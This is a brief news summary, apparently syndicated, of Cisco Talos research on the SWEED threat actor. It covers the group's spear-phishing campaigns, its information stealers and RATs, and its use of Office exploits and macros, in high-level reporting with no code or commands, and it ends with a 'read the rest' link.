A threat actor active since at least 2017 has been mainly targeting victims with information stealers and remote access Trojans (RATs), Cisco’s Talos security researchers explain.
Referred to as SWEED, the group has been observed using malware such as Formbook, Lokibot and Agent Tesla, consistently distributing those via spear-phishing emails with malicious attachments across its campaigns.
One of the earliest identified SWEED operations leveraged droppers inside ZIP archives to distribute a packed version of the Agent Tesla spyware. Steganography was used to decode a .NET executable that used the same technique to retrieve the final payload, Talos reveals.
In early 2018, the actor was using Java-based droppers to obtain information about the target system and facilitate the download of Agent Tesla.
In April last year, the actor started employing an exploit for the Office vulnerability tracked as CVE-2017-8759. A PowerPoint document (PPXS) containing code to trigger the remote code execution vulnerability in Microsoft .NET Framework was used.
In May 2018, SWEED switched to abusing another vulnerability in Office, namely CVE-2017-11882. The bug affects the Equation Editor, a decades-old tool present in the suite.
This year, the actor was observed leveraging malicious macros in Office documents to deliver malware. Spear-phishing emails and malicious attachments continue to be used as part of the infection process, with an obfuscated VBA macro used to execute a PowerShell script that performs some checks and then downloads an AutoIT-compiled script that performs more checks and delivers Agent Tesla.
Across several of ..
Support the originator by clicking the read the rest link below.
